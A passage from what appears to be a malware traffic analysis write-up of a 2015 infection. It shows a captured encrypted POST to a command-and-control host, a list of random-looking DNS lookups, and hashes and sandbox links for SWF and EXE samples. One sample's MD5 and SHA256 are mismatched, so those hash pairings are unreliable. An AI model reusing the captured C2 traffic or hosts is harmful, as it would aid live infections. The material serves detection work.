	c1=gmxF3phTjC+8OFSGFNCdljAPS0FGt3OrKkO2rt71bkoTFgcUyJcx/3Pm+fQoubED4QiA1EGXVmmKkLotN6lYw0rZ83NSrcQwLJmoJXa7pNalVstc&wciqei=+Wh9WDa2CTJA6H07QIzW9BWR14ILJumro+UojZayYUYndmrStcwZqEanE6tnooX2bUl2lDl9Q0SiMMR6iOdPYGXmqKxntkC54efmn9ECKLWoykp0KoowkyeLRTHVc73xFPPbVGlrEmgjqXg/Tu0RyFCKoJmJW699rsZ0NK9dtCPbpZCw3iIPVJMLiQXQ9uRs6TGHaYoiH78+D8fgAY0Aq1A3&qeoqeeq=Q+fWoMnvsrmEM8iDyNIz7ccDVeRmhcoFeUrCD6+gnHYbXB748S6h0o7E2zxXxC3aH+PgDIesUKaAbT3TABkWNQFglVRXEeaIs4+4S4Wa/2wODHbbgzofHqucgiqz4RJg&oi=aMKP8Kk4nh8286Us7L/9VTrztIDRNq/I3jJJpkO+WD9DuVtYgWnaXtR1hiYFBE06Wy6wyjzSBDI9HqcKBYPoNlQ9PZ10hXbmJcNK1qnv+NlTAt51TEyBbQ4er0b2JF1lQK0WIhKGbwAFbmY7pqUMgPo5yV+b+nYcCh3pHU43&mium5=4lH4p7o6NX+W0FxYJBt8L26UFaZ4sqGRyvg58sZZDUYn1eynh5+s3rpYOvlqWylYiqV7NzYiGPqN/BeArceWuphTwo1aXyn+GTHoHi7CnLrfSnYmcqxEg3yjC4jlBCUAQirXOL0KccjnincV6uLUQELc&moo=qf44CM+7QIwIOumHRqN59g8R4FzuCM0JLyITIC3+X16YW7egCD4z86y/wZQUVUWhRArANwZdDj1ixy/fHlSwEBN4RoBl/L+iQSohJcSqNgLIfIOyopy7Bzqmr8zCcErpZYANscig7vbesHGijVmeuupkHodtFABMBc6Hj8+MfMCLNoHLDQY04qJf

	HTTP/1.1 200 OK
	Server: nginx
	Date: Tue, 24 Nov 2015 16:17:08 GMT
	Content-Type: application/octet-stream
	Content-Length: 37
	Connection: keep-alive

	.J..........|...4.+...+....3.g2M.....
	

We then see the last POST to a different server this time:

	POST /news.php HTTP/1.0
	Host: chin.truffleman.co.uk
	Accept: */*
	Accept-Encoding: identity, *;q=0
	Accept-Language: en-US
	Content-Length: 705
	Content-Type: application/octet-stream
	Connection: close
	Content-Encoding: binary
	User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

	./6.P.@...(.....5^..?.=..o..}...4...p.:.....?.IF3r+E.i...P.<.+.....5....mpz......wpB..I..h....O.sn..=..fX.+..n.U5...".....u..:>JiS..1&..5.[v...B9...n.....?..y....[...qO.7zafv..L$.,s.c..m.Db;."..+r.=......P.._...!3.jt........b.A....d%.Ck..PDj3*...,...N#`.RQ.....^.J. ..X.C.C..8.+bzh..j..=H4.e.....eW.~.).`.kP....w...H....4..`Ui!vai).\.l...x.N....N.D.CA..z.K]:..........J.;...cQ...e..L^.^..}...R...0..G\.+..x..#...6.i.Qf....6..-._t.........C.\.!.z`l.-O.=.Vt..l.#...`.}q.r.?...2..,.....8.
	.z.....p...|K.?.0~9y.5g`./...U0....bA..p.7...l....r.>B..vb......,L..>.......*y^f...
	3&K..]:5;.B."...q.z'.%.b..7..W..7.(.Sb.{}....A...d3..3.l2!......(Z...~......E....F.{k(k..I......[2..........j`....Yn.d.m.....<....-....

	HTTP/1.1 200 OK
	Server: nginx/1.2.1
	Date: Tue, 24 Nov 2015 16:16:57 GMT
	Content-Type: text/html; charset=windows-1251
	Connection: close

	......L.<a. }.&...|.
	

One thing to mention as well, there were a fair good amount of DNS calls made that looked pretty abnormal. Please note that Chrome will do DNS pre-fetching which could cause some odd looking domains to be looked up as well (http://groups.google.com/a/chromium.org/forum/#!topic/chromium-discuss/F70-k_PGhEg). Here is a list of FQDNs that looked odd to me from the PCAP:

	11981 176.540744  10.1.25.119 63767 8.8.4.4      53 DNS  Standard query 0x2749  A jtikbwiyllxnyi61.com
	11983 176.819935      8.8.4.4 53 10.1.25.119  63767 DNS  Standard query response 0x2749 No such name
	11984 176.821924  10.1.25.119 60109 8.8.4.4      53 DNS  Standard query 0xc23c  A ghgmtcrluvghlwc91.com
	11988 176.915258      8.8.4.4 53 10.1.25.119  60109 DNS  Standard query response 0xc23c  A 127.0.1.1
	11989 176.926720  10.1.25.119 58168 8.8.4.4      53 DNS  Standard query 0x5cc3  A ghgmtcrluvghlwc91.com
	11990 177.005193      8.8.4.4 53 10.1.25.119  58168 DNS  Standard query response 0x5cc3  A 127.0.1.1
	11997 178.041367  10.1.25.119 57199 8.8.4.4      53 DNS  Standard query 0x043c  A qidxwsfqblej.com
	11998 178.171919      8.8.4.4 53 10.1.25.119  57199 DNS  Standard query response 0x043c No such name
	11999 178.173503  10.1.25.119 58882 8.8.4.4      53 DNS  Standard query 0xdad5  A lnhxwmhoyjxqmtgn9u.com
	12000 178.254598      8.8.4.4 53 10.1.25.119  58882 DNS  Standard query response 0xdad5  A 127.0.1.1
	12001 178.268719  10.1.25.119 52742 8.8.4.4      53 DNS  Standard query 0x1cf7  A lnhxwmhoyjxqmtgn9u.com
	12002 178.348164      8.8.4.4 53 10.1.25.119  52742 DNS  Standard query response 0x1cf7  A 127.0.1.1
	12040 179.351621  10.1.25.119 53261 8.8.4.4      53 DNS  Standard query 0xf345  A hsgxnjpdzifkjl4r.com
	12068 179.449632      8.8.4.4 53 10.1.25.119  53261 DNS  Standard query response 0xf345 No such name
	12073 179.452374  10.1.25.119 62977 8.8.4.4      53 DNS  Standard query 0x57eb  A xwhrskktvevezz0.com
	12112 179.540378      8.8.4.4 53 10.1.25.119  62977 DNS  Standard query response 0x57eb No such name
	12113 179.542265  10.1.25.119 50010 8.8.4.4      53 DNS  Standard query 0x2997  A rnhbhnlmpvvdt.com
	12158 179.651092      8.8.4.4 53 10.1.25.119  50010 DNS  Standard query response 0x2997  A 166.78.145.90
	12163 179.663157  10.1.25.119 50005 8.8.4.4      53 DNS  Standard query 0xb4c8  A rnhbhnlmpvvdt.com
	12194 179.748103      8.8.4.4 53 10.1.25.119  50005 DNS  Standard query response 0xb4c8  A 166.78.145.90
	12303 179.968038  10.1.25.119 61287 8.8.4.4      53 DNS  Standard query 0xb54b  A qtllebdadvitdim.com
	12334 180.059365      8.8.4.4 53 10.1.25.119  61287 DNS  Standard query response 0xb54b No such name
	12335 180.060984  10.1.25.119 56286 8.8.4.4      53 DNS  Standard query 0x9da2  A wyvpeiyaxycznuia6.com
	12372 180.155660      8.8.4.4 53 10.1.25.119  56286 DNS  Standard query response 0x9da2 No such name
	12373 180.157299  10.1.25.119 49396 8.8.4.4      53 DNS  Standard query 0xb029  A ncqauqvqqhhzpc.com
	12411 180.238941      8.8.4.4 53 10.1.25.119  49396 DNS  Standard query response 0xb029  A 95.211.205.229
	12415 180.252274  10.1.25.119 51862 8.8.4.4      53 DNS  Standard query 0x7ebc  A ncqauqvqqhhzpc.com
	12453 180.348244      8.8.4.4 53 10.1.25.119  51862 DNS  Standard query response 0x7ebc  A 95.211.205.229
	13636 193.071344  10.1.25.119 55508 8.8.4.4      53 DNS  Standard query 0x8551  A chin.truffleman.co.uk
	13637 193.272985      8.8.4.4 53 10.1.25.119  55508 DNS  Standard query response 0x8551  A 151.80.126.226
	

Results from Snort via Security Onion (ET rules):
=================================================
Results from Security Onion

VirusTotal links for links and files found:
===========================================
File Name: neuhaus-who.olp.swf
MD5: e7540e851a7334a3ce068e772b205ece
SHA256: d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9
First submission: 2015-12-04 14:39:03 UTC
Detection ratio: 6 / 55
Virustotal link: http://www.virustotal.com/en/file/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9/analysis/1449239943/
Hybrid-Analysis link (Windows 7 x64): http://www.hybrid-analysis.com/sample/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=2
Hybrid-Analysis link (Windows 7 x32): http://www.hybrid-analysis.com/sample/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=1
Malwr link: http://malwr.com/analysis/ZTgzN2QxODY5ZjcxNGZlYWFjYzM1ZDQxMDUxNjQ2MjM/

File Name: neuhaus-literature.disco.exe
MD5: 478294cf3367385f8715198fa27d0305
SHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
First submission: 2015-12-04 15:26:43 UTC
Detection ratio: 0 / 55
Virustotal link: http://www.virustotal.com/en/file/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8/analysis/1449242803/

File Name: neuhaus-yes.wbxml.exe
MD5: e7540e851a7334a3ce068e772b205ece
SHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
First submission: 2015-12-04 14:39:03 UTC
Detection ratio: 0 / 55
Virustotal link: http://www.virustotal.com/en/file/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8/analysis/1449242803/

Leave a Reply

Your email address will not be published. Required fields are marked *